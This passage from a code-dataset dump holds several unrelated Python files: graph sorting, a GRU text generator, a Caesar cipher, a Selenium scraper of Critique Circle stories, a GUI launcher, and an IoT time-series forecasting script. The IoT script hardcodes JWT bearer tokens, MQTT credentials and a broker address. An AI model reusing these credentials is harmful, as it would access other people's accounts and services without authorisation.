indegrees_groups[node_group] += 1\n \n \n \n# print(indegrees_items)\n# print(items_graph)\n \n# print(indegrees_groups)\n# print(group_graph)\n \n \n # determine group order and also check if it has cycle \n group_order = []\n \n queue = deque()\n for grp in range(m):\n if indegrees_groups[grp] == 0:\n queue.append(grp) \n \n \n while queue:\n current = queue.popleft()\n \n group_order.append(current)\n \n for nbr in group_graph[current]:\n indegrees_groups[nbr] -= 1\n \n if indegrees_groups[nbr] == 0:\n queue.append(nbr)\n \n if len(group_order) < m:\n return []\n \n \n items_order = []\n \n queue = deque()\n for item in range(n):\n if indegrees_items[item] == 0:\n queue.append(item)\n \n \n while queue:\n current = queue.popleft()\n\n items_order.append(current)\n\n for nbr in items_graph[current]:\n indegrees_items[nbr] -= 1\n\n if indegrees_items[nbr] == 0:\n queue.append(nbr)\n \n if len(items_order) < n:\n return []\n \n \n # group : items ordered\n all_order = defaultdict(list)\n \n for item in items_order:\n item_group = group[item]\n all_order[item_group].append(item)\n \n \n actual_order = []\n \n for grp in group_order: \n actual_order.extend(all_order[grp])\n \n \n return actual_order","repo_name":"meraf00/Competitive-Programming","sub_path":"1203-sort-items-by-groups-respecting-dependencies/1203-sort-items-by-groups-respecting-dependencies.py","file_name":"1203-sort-items-by-groups-respecting-dependencies.py","file_ext":"py","file_size_in_byte":2805,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"42819271335","text":"import torch\r\nimport pickle\r\nimport numpy as np\r\nimport torch.nn as nn\r\n\r\n\r\nclass Params:\r\n def __init__(self):\r\n self.filename = \"data.txt\" # 源文件\r\n self.w2v_filename = \"w2v.pkl\" # w2v文件\r\n self.model_filename = 'model.pth' # 模型存储位置\r\n self.device = \"cuda\" if torch.cuda.is_available () else \"cpu\"\r\n self.embedded_size = 256 # 每一个字从w2v算出来是[1 , embedded_size]向量\r\n self.word_size = 0 # w1算出来\r\n self.cut_size = 500 # 训练文段的长度\r\n self.batch_size = 32 # batch大小\r\n self.hidden_size = 128 # 中间层大小\r\n self.epochs = 500 # 学习次数\r\n self.lr = 0.1 # 学习率\r\n\r\n\r\nclass GruModel ( nn.Module ):\r\n def __init__(self):\r\n super ( GruModel , self ).__init__ ()\r\n self.embedded_size = params.embedded_size\r\n self.hidden_size = params.hidden_size\r\n self.word_size = params.word_size\r\n self.gru = nn.GRU ( input_size=self.embedded_size , hidden_size=self.hidden_size , batch_first=True )\r\n self.flatten = nn.Flatten ( 0 , 1 )\r\n self.linear = nn.Linear ( self.hidden_size , self.word_size )\r\n self.cross_entropy = nn.CrossEntropyLoss ()\r\n\r\n def forward(self , x_embedded , h0):\r\n x_embedded = x_embedded.to ( params.device )\r\n h0 = h0.to ( params.device )\r\n # x_embedded的形状:[batch , cut_size , embedded_size]\r\n hidden , hn = self.gru ( x_embedded , h0 )\r\n # hidden的形状:[batch , cut_size , hidden_size]\r\n flatten = self.flatten ( hidden )\r\n # flatten的形状:[batch x cut_size , hidden_size]\r\n predict = self.linear ( flatten )\r\n # pre的形状:[batch x cut_size , word_size]\r\n return predict , hn\r\n\r\n def init_h0(self , batch_size):\r\n return torch.zeros ( (1 , batch_size , self.hidden_size) , device=params.device )\r\n\r\n\r\ndef generator(length , starts):\r\n h = model.init_h0 ( 1 )\r\n h = h.to ( params.device )\r\n result = \"\"\r\n result += starts\r\n word_index = word_to_index[ \"。\" ]\r\n # 预热\r\n for prefix in starts:\r\n if prefix in word_to_index.keys ():\r\n word_index = word_to_index[ prefix ]\r\n word_embedded = w1[ word_index ].reshape ( 1 , 1 , -1 )\r\n word_embedded = torch.tensor ( word_embedded )\r\n prediction , h = model ( word_embedded , h )\r\n for i in range ( length ):\r\n word_embedded = w1[ word_index ].reshape ( 1 , 1 , -1 )\r\n word_embedded = torch.tensor ( word_embedded )\r\n prediction , h = model ( word_embedded , h )\r\n word_index = int ( torch.argmax ( prediction ) )\r\n word = index_to_word[ word_index ]\r\n result += word\r\n print ( result )\r\n\r\n\r\nif __name__ == '__main__':\r\n params = Params ()\r\n model = torch.load ( params.model_filename , map_location=params.device )\r\n w1 , word_to_index , index_to_word = pickle.load ( open ( \"w2v.pkl\" , \"rb\" ) )\r\n while True:\r\n starts = input ( \"请输入主题:\" )\r\n length = input ( \"请输入长度:\" )\r\n try:\r\n length = int ( length )\r\n except:\r\n length = 200\r\n generator ( length , starts )\r\n","repo_name":"gaowenshuo/EsGenGpt","sub_path":"(Abandoned)EsGenLstm_predict.py","file_name":"(Abandoned)EsGenLstm_predict.py","file_ext":"py","file_size_in_byte":3252,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"77"} +{"seq_id":"7381840908","text":"import os\n\n\n# function implementing caesar cipher\ndef encrypt(text, s):\n result=\"\"\n # traverse text\n for i in range(len(text)):\n char = text[i]\n # Encrypt uppercase characters\n if (char.isupper()):\n result+= chr((ord(char) + s - 65) % 26 + 65)\n # Encrypt lowercase characters\n else:\n result+= chr((ord(char) + s - 97) % 26 + 97)\n return result\n\nif __name__ == '__main__':\n\n text=input(\"enter text to encrypt:\")\n s=int(input(\"enter shift:\"))\n print(\"encrypted text:\",encrypt(text,s))\n\n","repo_name":"joebeck20/College","sub_path":"SEM 4/Python/Worksheets/PS4/ps2_8.py","file_name":"ps2_8.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"9783096259","text":"from selenium import webdriver\nfrom time import sleep\nfrom webdriver_manager.chrome import ChromeDriverManager\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.common.exceptions import NoSuchElementException\n\nfrom sys import platform\nimport sys\n\n\nfrom database import *\nfrom scraper_classes import *\n\nimport multiprocessing as mp\n\nimport threading\n\nimport csv\n\nimport argparse\nparser = argparse.ArgumentParser()\nparser.add_argument(\"-sm\", \"--skip-metadata\", action='store_true', help=\"Skip metadata scraping\")\nparser.add_argument(\"-sc\", \"--skip-critique\", action='store_true', help=\"Skip critique scraping\")\n\n\ncc_up_for_review_url = \"https://www.critiquecircle.com/queue.asp?status=1\"\ncc_upcoming_url = \"https://www.critiquecircle.com/queue.asp?status=2\"\ncc_older_stories_url = \"https://www.critiquecircle.com/queue.asp?status=3\"\ncc_options_url = \"https://www.critiquecircle.com/queue.asp?action=options\"\n\n# NOTE(JR): Given the naming scheme, I have to assume these ids are\n# extremely liable to be changed. This should be considered fragile\n# These are used to ID tables in the old stories page\nmetadata_tables = [\n \"newbie_queue_metadata\",\n \"general_metadata\",\n \"fantasy_metadata\",\n \"scifi_metadata\",\n \"romance_metadata\",\n \"ya_metadata\",\n \"suspense_metadata\"\n]\n\ntable_ids = [\n \"queue_349\", # newbie queue\n \"queue_1\", # general\n \"queue_7\", # fantasy\n \"queue_1247\", # scifi\n \"queue_8\", # romance\n \"queue_26\", # ya\n \"queue_540\" # suspense\n]\n\nblock_ids = [\n \"qd349\", # newbie queue\n \"qd1\", # general\n \"qd7\", # fantasy\n \"qd1247\", # scifi\n \"qd8\", # romance\n \"qd26\", # ya\n \"qd540\" # suspense\n]\n\n# CSV files do *not* like having line breaks in their stored strings\n# A standard workaround is to replace \"\\n\" with an uncommonly used symbol\n# I picked the Ϯ (coptic capital letter dei) as it seemed unlikely to\n# appear in our data set\nline_break_replacement = \"\\u03EE\"\n\n\ndef login(driver):\n # IMPORTANT(JR): please enter your own cc email and password\n # moreover, please do not commit your user/pass to the repo\n user = ''\n password = ''\n\n driver.get('https://new.critiquecircle.com/login')\n\n username_box = driver.find_element_by_xpath(\"//input[@type='username']\")\n username_box.send_keys(user)\n\n password_box = driver.find_element_by_xpath(\"//input[@type='password']\")\n password_box.send_keys(password)\n\n login_box = driver.find_element_by_xpath(\"//button[@type='submit']\")\n login_box.click()\n\n\ndef get_next_button(driver, block_id):\n return driver.find_element_by_css_selector(\"#\" + block_id + \" table.FaintBorderBlue td.smalltext:nth-of-type(2) a:nth-last-child(2)\")\n\ndef process_metadata_row(metadata, row):\n # Critique circle allows users to lock content away from accounts that haven't reviewed other stories\n # Assuming that our scraper accounts haven't done any actual reviewing, I figured it best to skip\n locked_icons = row.find_elements_by_css_selector('td:nth-child(1) img[src*=\"images/shield_\"]')\n if len(locked_icons) > 0:\n return \"skipped\"\n\n story_title = row.find_element_by_css_selector(\"td:nth-child(1)\").text\n story_link = row.find_element_by_css_selector(\"td:nth-child(1) a\").get_attribute('href')\n\n author = row.find_element_by_css_selector(\"td:nth-child(2) a.hoverlink span\").text\n author_link = row.find_element_by_css_selector(\"td:nth-child(2) a.hoverlink\").get_attribute('href')\n\n word_count = int(row.find_element_by_css_selector(\"td:nth-child(4) nobr\").text.replace(\",\", \"\"))\n\n genre = row.find_element_by_css_selector(\"td:nth-child(5) nobr\").text\n\n crit_count = int(row.find_element_by_css_selector(\"td:nth-child(6) nobr\").text)\n\n sm = StoryMetadata(story_title, story_link, author, author_link, word_count, genre, crit_count)\n metadata.append(sm)\n\n return \"added\"\n\ndef gather_metadata(driver, table_name, table_id, block_id):\n driver.get(cc_options_url)\n type_checkbox = driver.find_element_by_css_selector(\"input#Type\")\n if type_checkbox.is_selected() is False:\n type_checkbox.click()\n\n # Load up main queue page\n driver.get(cc_older_stories_url)\n metadata = list()\n\n next_button = get_next_button(driver, block_id)\n pagination_count = 0\n\n #while next_button and pagination_count <= 0:\n while next_button:\n table = driver.find_element_by_css_selector(\"#\" + table_id)\n\n for row in table.find_elements_by_css_selector(\"tr.or\"):\n process_metadata_row(metadata, row)\n\n # preparation for next loop iteration\n if next_button:\n next_button.click()\n next_button = get_next_button(driver, block_id)\n if next_button.text != \">>\":\n break\n pagination_count += 1\n else:\n break\n\n return metadata\n\ndef process_row_metadata(driver, metadata):\n stories = list()\n for m in metadata:\n driver.get(m.story_link)\n\n # The forbidden icon appears on 18+ pages, which we're skipping\n forbidden_icon = driver.find_elements_by_css_selector('img[src*=\"images/forbidden\"]')\n if len(forbidden_icon) > 0:\n continue\n\n author_notes = \"\"\n try:\n author_notes = driver.find_element_by_css_selector(\".authornotes\").text \\\n .replace(\"\\n\", line_break_replacement)\n # .replace(\"\\n\", line_break_replacement).encode('utf-8')\n except NoSuchElementException:\n author_notes = \"\"\n story_chunks = driver.find_elements_by_css_selector(\"#story p\")\n story_text = \"\"\n for sc in story_chunks:\n story_text += sc.text.strip()\n story_text += \"\\n\"\n #story_text = story_text.replace(\"\\n\", line_break_replacement).encode('utf-8')\n story_text = story_text.replace(\"\\n\", line_break_replacement)\n\n story_id = str(hash(m.author + m.story_title) + sys.maxsize + 1)\n \n story = FullStoryMetadata(\n story_id,\n m.author,\n m.author_link,\n m.story_title,\n m.story_link,\n m.word_count,\n m.genre,\n m.crit_count,\n author_notes,\n story_text\n )\n stories.append(story)\n\n return stories\n\ndef run_metadata_scraper_manager(table_name, table_id, block_id):\n options = webdriver.ChromeOptions()\n options.add_argument(\"--disable-extensions\")\n options.add_argument(\"--disable-gpu\")\n options.add_argument(\"--headless\")\n if platform == \"linux\" or platform == \"linux2\":\n options.add_argument(\"--no-sandbox\")\n \n driver = webdriver.Chrome(ChromeDriverManager().install(), chrome_options=options)\n\n # Per Table Scraping Options\n login(driver)\n row_metadata = gather_metadata(driver, table_name, table_id, block_id)\n full_metadata = process_row_metadata(driver, row_metadata)\n insert_story_metadata(table_name, full_metadata)\n\n driver.quit()\n\ndef run_threaded_metadata_scraper():\n processes = []\n for i in range(len(metadata_tables)):\n #for i in range(1):\n p = mp.Process(target=run_metadata_scraper_manager, args=(metadata_tables[i], table_ids[i], block_ids[i]))\n processes.append(p)\n p.start()\n\n for p in processes:\n p.join()\n\ndef run_critique_scraper_manager(table_name):\n options = webdriver.ChromeOptions()\n options.add_argument(\"--disable-extensions\")\n options.add_argument(\"--disable-gpu\")\n options.add_argument(\"--headless\")\n if platform == \"linux\" or platform == \"linux2\":\n options.add_argument(\"--no-sandbox\")\n \n driver = webdriver.Chrome(ChromeDriverManager().install(), chrome_options=options)\n \n login(driver)\n metadata = get_stored_metadata(table_name)\n\n critiques = []\n for m in metadata:\n driver.get(m.story_link)\n\n # update metadata entry to say it's processed\n update_metadata(table_name, m.story_id)\n\n # The forbidden icon appears on 18+ pages, which we're skipping\n forbidden_icon = driver.find_elements_by_css_selector('img[src*=\"images/forbidden\"]')\n if len(forbidden_icon) > 0:\n continue\n\n critique_table = driver.find_element_by_css_selector(\".tablecls\")\n\n for row in critique_table.find_elements_by_css_selector(\"tr.or, tr.er\"):\n # The HTML used for display the critiques in a table is quite gnarly\n # Specifically, tr.or -or- tr.er could be the last row, which doesn't\n # have 5 columns but instead just one with a link, this bit tests for \n # the last row and moves on if that's the case\n last_row_text_check = row.find_element_by_css_selector(\"td:nth-child(1) a\").text\n if last_row_text_check == \"View all Inline Critiques together\":\n continue\n\n # Doing type first because if it's classic we're skipping\n critique_type = row.find_element_by_css_selector(\"td:nth-child(5)\").text\n if critique_type == \"Classic\":\n continue\n\n critique_link = row.find_element_by_css_selector(\"td:nth-child(1) nobr a\").get_attribute('href')\n word_count = row.find_element_by_css_selector(\"td:nth-child(4)\").text\n\n # The tr/except is necessary here because an Anonymous critique won't have an anchor tag\n # for the scraper to find\n critic_name = \"\"\n critic_link = \"\"\n try:\n critic_name = row.find_element_by_css_selector(\"td:nth-child(2) a\").text\n critic_link = row.find_element_by_css_selector(\"td:nth-child(2) a\").get_attribute('href')\n except NoSuchElementException:\n critic_name = 'Anonymous'\n critic_link = 'None'\n\n cm = CritiqueMetadata(\n m.story_id,\n critic_name, \n critic_link, \n critique_link, \n word_count, \n critique_type\n )\n critiques.append(cm)\n\n filled_critiques = []\n for critique in critiques:\n driver.get(critique.critique_link)\n\n comment_count = 0\n comments = driver.find_elements_by_css_selector('div[id^=\"c_\"')\n for c in comments:\n comment_text = c.text.replace(\"\\n\", line_break_replacement)\n comment_num = c.get_attribute('id').replace(\"c_\", \"\")\n comment_target = driver.find_element_by_xpath(\"//p[@onclick=\\\"ToggleComment(this, \" + comment_num + \");\\\"]\")\n target_text = comment_target.text.replace(\"\\n\", line_break_replacement)\n\n fc = FullCritique(\n critique.submission_id,\n critique.critic_name, \n critique.critic_link, \n critique.critique_link, \n critique.word_count, \n critique.critique_type,\n target_text,\n comment_text\n )\n filled_critiques.append(fc)\n \n\n insert_critiques(filled_critiques)\n\n driver.quit()\n\ndef run_threaded_critique_scraper():\n processes = []\n for i in range(len(metadata_tables)):\n #for i in range(1):\n print(metadata_tables[i])\n p = mp.Process(target=run_critique_scraper_manager, args=(metadata_tables[i],) )\n processes.append(p)\n p.start()\n\n for p in processes:\n p.join()\n\ndef serialize_stories_to_csv():\n submission_csv_headers = ['submission_id', 'author', 'author_link', 'story_title',\n 'story_link', 'word_count', 'genre', 'crit_count', 'author_notes', 'story_text']\n \n\n submission_csv = open('critiquecircle_submissions.csv', 'w', newline='')\n sw = csv.writer(submission_csv)\n sw.writerow(submission_csv_headers)\n\n try:\n for table_name in metadata_tables:\n metadata = get_stored_metadata(table_name, status=\"true\")\n for m in metadata:\n sw.writerow([\n str(m.story_id).replace(\"\\n\", line_break_replacement).encode('utf-8'),\n m.author.replace(\"\\n\", line_break_replacement).encode('utf-8'),\n m.author_link.replace(\"\\n\", line_break_replacement).encode('utf-8'),\n m.story_title.replace(\"\\n\", line_break_replacement).encode('utf-8'),\n m.story_link.replace(\"\\n\", line_break_replacement).encode('utf-8'),\n m.word_count.replace(\"\\n\", line_break_replacement).encode('utf-8'),\n m.genre.replace(\"\\n\", line_break_replacement).encode('utf-8'),\n m.crit_count.replace(\"\\n\", line_break_replacement).encode('utf-8'),\n m.author_notes.replace(\"\\n\", line_break_replacement).encode('utf-8'),\n m.story_text.replace(\"\\n\", line_break_replacement).encode('utf-8')\n ])\n finally:\n submission_csv.close()\n\ndef serialize_critiques_to_csv():\n critique_csv_headers = ['comment_id', 'submission_id', 'critic_name', 'critic_link', 'critique_link', 'word_count', 'critique_type', 'story_target', 'target_comment']\n critique_csv = open('critiquecircle_critiques.csv', 'w', newline='')\n cw = csv.writer(critique_csv)\n cw.writerow(critique_csv_headers)\n\n try:\n critiques = get_stored_critiques()\n for c in critiques:\n cw.writerow([\n str(c.critique_id).replace(\"\\n\", line_break_replacement).encode('utf-8'),\n str(c.submission_id).replace(\"\\n\", line_break_replacement).encode('utf-8'),\n c.critic_name.replace(\"\\n\", line_break_replacement).encode('utf-8'),\n c.critic_link.replace(\"\\n\", line_break_replacement).encode('utf-8'),\n c.critique_link.replace(\"\\n\", line_break_replacement).encode('utf-8'),\n c.word_count.replace(\"\\n\", line_break_replacement).encode('utf-8'),\n c.critique_type.replace(\"\\n\", line_break_replacement).encode('utf-8'),\n c.story_target.replace(\"\\n\", line_break_replacement).encode('utf-8'),\n c.target_comment.replace(\"\\n\", line_break_replacement).encode('utf-8')\n ])\n finally:\n critique_csv.close()\n\ndef main():\n run_connection_health_check()\n for table_name in metadata_tables:\n create_story_metadata_table(table_name)\n create_critique_table()\n\n args = parser.parse_args()\n if args.skip_metadata is not True:\n run_threaded_metadata_scraper()\n\n if args.skip_critique is not True:\n run_threaded_critique_scraper()\n\n serialize_stories_to_csv()\n serialize_critiques_to_csv()\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"flowpoint/CARP","sub_path":"scraper/critiquecircle.py","file_name":"critiquecircle.py","file_ext":"py","file_size_in_byte":14750,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"71239046329","text":"from GnuChanGUI import *\nimport subprocess\n\n\ndef main():\n default = GnuChanGUI(Title=\"GnuChan Program Runner\", Size=(610,600), resizable=True)\n default.Theme()\n\n defaultFont = \"Sans, 20\"\n\n gnuchanProgramList = [\" gRunner : Simple Dmenu Like Program\", \n \" gCalculator : Simple Calculator A+B=C\", \n \" gTimer : Simple Timer Program\",\n \" gTextEditor : Simple Text Editor\",\n \" gMusicPlayer : Simple Music Player\",\n \" gYTMV_Download : Youtube Music and Video Download\",\n \" gTerminal : Simple Terminal Emulator\"]\n \n gMenu = [[\"Info\", [\"GnuChanOS\", \"Youtube Channel\", \"Github Page\"]],\n [\"System\", [\"Exit\"]]]\n\n layout = [\n [default.GMenuForTheme(winMenu=gMenu, font=\"Sans, 16\")],\n [default.GText(title=\"This is Simple Program Runner\", font=defaultFont, position=\"center\", xStretch=True)],\n [default.GText(title=\"\", font=defaultFont, xStretch=True)],\n [default.GListBox(list=list(gnuchanProgramList), font=defaultFont, xStretch=True, yStretch=True, value=\"prunner\", position=\"center\", noScroolBar=True)],\n [default.GButton(\"Run\", xStretch=True, font=defaultFont)]\n ]\n\n default.GWindow(mainWindow=layout)\n default.GListBoxFixer(value=\"prunner\", border=0)\n\n while True:\n event, GetValues = default.window.read()\n if event == WIN_CLOSED:\n break\n if event == \"Exit\":\n break\n\n oldVar = str(GetValues[\"prunner\"])[2:]\n newVar = oldVar.split(\":\")[0].strip()\n\n\n if event == \"Run\":\n pyName = f\"{newVar}.py\"\n subprocess.Popen(f\"python ~/.config/qtile/gnuchanPrograms/{pyName}\", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n break\n\n default.window.close()\nif __name__ == \"__main__\":\n main()\n\n\n\n\"\"\"\nxdsl numarası\n\n\"\"\"","repo_name":"gnuchanos/GnuchanOS","sub_path":"dotfiles/system/qtile/gnuchanPrograms/gGnuChanOS_Programs.py","file_name":"gGnuChanOS_Programs.py","file_ext":"py","file_size_in_byte":1945,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"13691243932","text":"#!/usr/bin/python3\n\nimport json\nimport time\nimport math\nimport random\nimport statsmodels\nimport pandas as pd\nfrom datetime import datetime\n\nfrom scipy.stats import norm\nimport statsmodels.api as sm\n## for plot of models\nimport matplotlib.pyplot as plt\n## used in the part where RSME cost function is computed\nfrom math import sqrt\nfrom sklearn.metrics import mean_squared_error\n## the below is needed for AR models\nfrom statsmodels.tsa.ar_model import AutoReg\n## the below is needed for MA, ARMA, and ARIMA models\nfrom statsmodels.tsa.arima.model import ARIMA\nimport numpy as np\n#ignore harmless warning with code below\nimport warnings\n\nimport http.client\nfrom time import time\nfrom time import mktime\nimport ssl\n\nfrom minio import Minio\nimport pickle\nimport io\nimport paho.mqtt.client as mqtt\n\nEPSILON = 1e-10\n\ndef _percentage_error(actual: np.ndarray, predicted: np.ndarray):\n \"\"\"\n Percentage error\n Note: result is NOT multiplied by 100\n \"\"\"\n return _error(actual, predicted) / (actual + EPSILON)\n\ndef mape(actual: np.ndarray, predicted: np.ndarray):\n \"\"\"\n Mean Absolute Percentage Error\n Properties:\n + Easy to interpret\n + Scale independent\n - Biased, not symmetric\n - Undefined when actual[t] == 0\n Note: result is NOT multiplied by 100\n \"\"\"\n return np.mean(np.abs(_percentage_error(actual, predicted)))\n\ndef smape(actual: np.ndarray, predicted: np.ndarray):\n \"\"\"\n Symmetric Mean Absolute Percentage Error\n Note: result is NOT multiplied by 100\n \"\"\"\n return np.mean(2.0 * np.abs(actual - predicted) / ((np.abs(actual) + np.abs(predicted)) + EPSILON))\n\ndef _naive_forecasting(actual: np.ndarray, seasonality: int = 1):\n \"\"\" Naive forecasting method which just repeats previous samples \"\"\"\n return actual[:-seasonality]\n\ndef mase(actual: np.ndarray, predicted: np.ndarray, seasonality: int = 1):\n \"\"\"\n Mean Absolute Scaled Error\n Baseline (benchmark) is computed with naive forecasting (shifted by @seasonality)\n \"\"\"\n return mae(actual, predicted) / mae(actual[seasonality:], _naive_forecasting(actual, seasonality))\n\ndef _error(actual: np.ndarray, predicted: np.ndarray):\n \"\"\" Simple error \"\"\"\n return actual - predicted\n\ndef mae(actual: np.ndarray, predicted: np.ndarray):\n \"\"\" Mean Absolute Error \"\"\"\n return np.mean(np.abs(_error(actual, predicted)))\n\ndef mse(actual: np.ndarray, predicted: np.ndarray):\n \"\"\" Mean Squared Error \"\"\"\n return np.mean(np.square(_error(actual, predicted)))\n\n\ndef rmse(actual: np.ndarray, predicted: np.ndarray):\n \"\"\" Root Mean Squared Error \"\"\"\n return np.sqrt(mse(actual, predicted))\n\ndef compare(l1, l2, l3):\n count = 0\n for i in range(len(l1)):\n if(l1[i] < l2[i]):\n count+=1\n if(l1[i] < l3[i]):\n count+=1\n return count\n\ndef publishErr(sensor, error, timestamp):\n #function for bublishing count of ppl called every 15 mins\n client = mqtt.Client(\"platform\")\n client.username_pw_set(username=\"JWT\", password=\"eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJpYXQiOjE2MjA4NzI2ODUsImlzcyI6ImlvdHBsYXRmb3JtIiwic3ViIjoiNTBfMTA3In0.x40nxuvC7xAGbXsuM0HsxE_uzya3oGFfu-pcI09e0e4h_tIuDn6em0NxyAmDjbjECKpQPoCuTlam9BRV8VSZkv3YwYNNATxesQJQ0XYHA9QUTdXzSZgefiLTE00nSq9gPD6O2dddwx6egAr9xcPqlOC6WXOU9mb1pnFoOv0BMymLvsSJndsB4bxMxi3CYrMirFRxFzPaGFZvwRNMmZZ5oGWtLhtLJ7cJ0t0wdD9jV1334AQfCayQvb9n7_6E3ruSZjfUdGMj5jV9lFaChfKjzs2yq15dDfKbbfOkDGwLPrpURH3Y65ycuPyaUn6TTz_EwUF2d5Ai5i2x5cJn_TSQ2vbDJw3BZxcBZ7NxiXoG00OwQ02QXMAryyYJ1SKdr_BPxyy2C2XeZFGg3ip42bUkn92tScFiQtzUp-WaQSFWiZK3D1sdJglPb6l1iEQCI7HfNk0g0ADlvKh_aGTcxy4sjFM69phDfj_UV7T5Of-BV1lk7mifC2tdg1rqqttCMQ9uNbnsrw6YcfsO896zr7uFDaVsG98veUCXQYtuXkbn3XWqxGUM13H6nb2ThlZn2dMxi5EsWKXktyQDtAmB_Sf4akU6MU4uW-d8QpzTv9wPaW2Qo1KagA6KIcdM9AjT9J8BsLd8kzMyuUIpVoioT5REp3kIRACzcLLiY6YxyXCy22U\")\n client.connect(\"131.159.35.132\", 1883)\n\n payload = {\n \"username\": \"group2_2021_ss\",\n sensor: error,\n \"device_id\": 107,\n \"timestamp\": timestamp\n }\n client.publish(\"50_107\", json.dumps(payload))\n print(\"Just published \" + str(payload) + \" to topic 50_107\")\n\ndef publishPred(count, timestamp):\n\n client = mqtt.Client(\"platform\")\n client.username_pw_set(username=\"JWT\", password=\"eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJpYXQiOjE2MjA4NzI2ODUsImlzcyI6ImlvdHBsYXRmb3JtIiwic3ViIjoiNTBfMTA3In0.x40nxuvC7xAGbXsuM0HsxE_uzya3oGFfu-pcI09e0e4h_tIuDn6em0NxyAmDjbjECKpQPoCuTlam9BRV8VSZkv3YwYNNATxesQJQ0XYHA9QUTdXzSZgefiLTE00nSq9gPD6O2dddwx6egAr9xcPqlOC6WXOU9mb1pnFoOv0BMymLvsSJndsB4bxMxi3CYrMirFRxFzPaGFZvwRNMmZZ5oGWtLhtLJ7cJ0t0wdD9jV1334AQfCayQvb9n7_6E3ruSZjfUdGMj5jV9lFaChfKjzs2yq15dDfKbbfOkDGwLPrpURH3Y65ycuPyaUn6TTz_EwUF2d5Ai5i2x5cJn_TSQ2vbDJw3BZxcBZ7NxiXoG00OwQ02QXMAryyYJ1SKdr_BPxyy2C2XeZFGg3ip42bUkn92tScFiQtzUp-WaQSFWiZK3D1sdJglPb6l1iEQCI7HfNk0g0ADlvKh_aGTcxy4sjFM69phDfj_UV7T5Of-BV1lk7mifC2tdg1rqqttCMQ9uNbnsrw6YcfsO896zr7uFDaVsG98veUCXQYtuXkbn3XWqxGUM13H6nb2ThlZn2dMxi5EsWKXktyQDtAmB_Sf4akU6MU4uW-d8QpzTv9wPaW2Qo1KagA6KIcdM9AjT9J8BsLd8kzMyuUIpVoioT5REp3kIRACzcLLiY6YxyXCy22U\")\n client.connect(\"131.159.35.132\", 1883)\n\n payload = {\n \"username\": \"group2_2021_ss\",\n \"bestOnline\": count,\n \"device_id\": 107,\n \"timestamp\": timestamp\n }\n client.publish(\"50_107\", json.dumps(payload))\n print(\"Just published \" + str(payload) + \" to topic 50_107\")\n\n #publishing to sensor node\n client = mqtt.Client(\"sensor\")\n client.connect(\"test.mosquitto.org\")\n\n client.publish(\"/topic/nadija/predictions\", str(count).zfill(2))\n print(\"Just published \" + str(count).zfill(2) + \" to topic /topic/nadija/predictions\")\n\nCONSUMER_URL = 'iotplatform.caps.in.tum.de:443'\nDEV_JWT = 'eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJpYXQiOjE2MjA5MTQ2OTMsImlzcyI6ImlvdHBsYXRmb3JtIiwic3ViIjoiNTBfODMifQ.mB9292Db6piVAOIcDnOKO5VFO6qWXmLNWuKOKrRN8FIjMnnfyO0XNOr9k2YjtDhHVyo8JI1igbDht8BRsre1zeM6JIsIwCpNZ9polPFb93hHf04xHyn0vsWw5JO2YeY4-ifyX-WifIgpwWfJvbaqZn_nY2P_thmqpH9tNKEOAkZVf3ovV_9WypzYH7z_mCfId0TI9W96L3LJtU6HEorT4A1ft5XXbZxgQZudzENoYg3J2UvFwtI42phMGbor4i9LrHCd9y6uv46s78-qnUgEWpd3qL91wdtJT0JFgkUlc8BwXyPIwJIQWb0-AR090Upv59aIkmIqig4LGO1ogX49eHcasw0Rzp1nT8aBWBY8lJjsZ3bk-rH2EYelr5RARK2q_zKQjDt9mFWTeERyeVmbpkEyur4hwbnse0zGee9hUgair3LCs-2AWYqCkXGqDjFzcAuuLCSCQtXqXw-hENtcnCo8_q_F9G_KzSNqRPZ1VViA_3a-0I7EALzNGsGdrUk_KCaVY2sXmBOX3Px4jVGxxE-IDJPK723DL1dQgHR_IICyNT-wdbaZMSU5GyevMOrCRyKEXnvlSWakXqJagdmw5JVRivcdJ8aNnMMZgllbXYW7wJDTZYwMeyZjqIBkNBfsVuhGGjknsugW4FUZnoqwXS3QuUCgtD7pZt4Kaz_9CZI'\n\nsensorID = 1248\nbatchSize = 100\nsearchPath = '/api/consumers/consume/' + str(sensorID) + '/_search?' #base path - search all\ncountPath = '/api/consumers/consume/' + str(sensorID) + '/_count?' #base path - count all\n\ngenerated_ts = pd.DataFrame(columns = ['time', 'count'])\n\nts = time()\ncurTs = int(ts - (ts % 60))\n\n#we get the counts published in the last 15 minutes if there is more counts, we take last one of them\n#we get data from last 15 minutes because in that time interval there must be at least one prediction, \n#since we push preditions on every 15 minutes even if there are no enter/leave commands\n\nweekAgoTs = int(curTs - 15 * 60 * 60)\nsQuery = 'q=timestamp:[' + str(weekAgoTs*1000) + '%20TO%20' + str(curTs*1000) + ']'\nsearchPath = searchPath + sQuery\ncountPath = countPath + sQuery\n\n# Get the data\nconsumerConn = http.client.HTTPSConnection(CONSUMER_URL,context = ssl._create_unverified_context())\nconsumerConn.connect()\n\nscroll_id = ''\nwhile True:\n # Slicing requests\n if scroll_id == '':\n searchPath = searchPath + '&scroll=3m&size=' + str(batchSize)\n consumerConn.request('GET', searchPath, '', { \"Content-Type\": \"application/x-www-form-urlencoded\", \"Authorization\": \"Bearer \" + DEV_JWT })\n else:\n searchPath = '/api/consumers/consume/' + str(sensorID) + '/_search/scroll?size=' + str(batchSize)\n consumerConn.request('GET', searchPath, '{\"scroll\":\"3m\",\"scroll_id\":\"' + scroll_id + '\"}',\n { \"Content-Type\": \"application/json\", \"Authorization\": \"Bearer \" + DEV_JWT })\n iotPlResp = consumerConn.getresponse()\n rawData = iotPlResp.read()\n respData = json.loads(rawData)\n respData = respData[\"body\"]\n #print(scroll_id)\n if scroll_id == '':\n scroll_id = respData[\"_scroll_id\"]\n observationsArray = 